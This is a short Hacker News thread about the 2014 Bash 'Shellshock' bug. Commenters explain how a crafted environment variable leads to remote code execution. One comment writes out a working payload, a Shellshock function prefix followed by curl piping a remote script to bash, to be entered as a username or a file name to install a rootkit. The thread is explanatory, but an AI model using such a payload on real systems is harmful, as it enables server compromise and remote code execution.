

Bash bug as big as Heartbleed - dpeck
http://blog.erratasec.com/2014/09/bash-bug-as-big-as-heartbleed.html

======
CGamesPlay
It's serious. It's a remote code execution vulnerability under whatever user
was running bash, and can be exploited by controlling an environment variable.
For example, if I enter

    
    
      () { _;}; curl http://rootk.it | bash
    

As my username on your website, and your website runs a script and sets
TARGET_USER to my username, then I will install my rootkit on your web server.

See:
[https://access.redhat.com/articles/1200223](https://access.redhat.com/articles/1200223)

~~~
pan69
I'm no security expert by any means and I'm probably not aware of the severity
of this issue, but:

>> If I enter [script] As my username on your website, and your website runs a
script and sets TARGET_USER to my username, then I will install my rootkit on
your web server.

How contrived is this? I mean, who does this in the first place? Isn't this
more an issue with weird authentication?

Again, I'm probably ignorant how all of this works so if anyone could give a
better explanation...

~~~
CGamesPlay
A potentially more likely scenario might be: "If I upload [script].jpg to your
image service and you run a resizer that takes IMAGE_FILE as an environment
variable as input, then I will install my rootkit".

